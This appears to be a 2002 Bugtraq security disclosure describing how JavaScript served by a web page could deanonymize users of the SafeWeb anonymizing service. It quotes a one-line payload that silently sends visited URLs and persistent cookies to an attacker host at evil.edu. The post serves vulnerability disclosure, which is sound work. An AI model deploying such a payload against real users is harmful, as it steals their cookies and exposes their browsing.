Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world". .. Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit).. . .
Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world". .. Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit).

 Date: Mon, 11 Feb 2002 21:13:27 -0500 From: David Martin  To: bugtraq@securityfocus.com Subject: Deanonymizing SafeWeb Users  Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world".  SafeWeb licensed their technology to PrivaSec, who is currently running the technology in a preview program for a planned subscription service.  They also licensed it to the CIA.  Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit).  An example (really one long line):  self['window']['top'].frames[0]['cookie_munch'] = Function('i=new Image(1,1);i.s'+'rc=" cation"].URL_text.value+(new Date()).getTime()+document.cookie;');  This is spyware.  Any Web page containing this JavaScript makes the SafeWeb browser silently report every URL visited to the attacker at evil.edu, along with a copy of all of the persistent cookies previously established through SafeWeb.  It works regardless of the user's security settings (recommended vs paranoid mode, etc.)  This attack is the only one we describe that depends on the browser: it works in Netscape 6.x and probably previous versions, but not IE.  We have an attack that does basically the same thing and works in IE too, but it's a bit longer.  Since our attacks are just JavaScript, they probably don't depend on the OS of the victim.  Basically, using the SafeWeb privacy service helps keep user identities out of routinely gathered log files, but it creates serious new risks for anyone an adversary might bother to actually target.  You have to wonder whether this is a good tradeoff.  After all, in the absence of serious bugs, Web browsers generally prevent Web sites from silently depositing spyware or snarfing all of the user's cookies.  One thing is clear: most users in the intended market for this system had no idea that this system brought any risks with it.  For the full report (23 pages, PDF):   We've been in touch with SafeWeb since October, and with PrivaSec for about a month now.  Some related problems in SafeWeb involving JavaScript spilling IP addresses have been noted here (by Alexander Yezhov) and in alt.privacy.anon-server (by Paul Rubin).  Our paper adds spyware, cookie snarfing, and the essential equivalence between SafeWeb's "paranoid" and "recommended" modes of operation to the list of problems with SafeWeb's technology.  David Martin  Andrew Schulman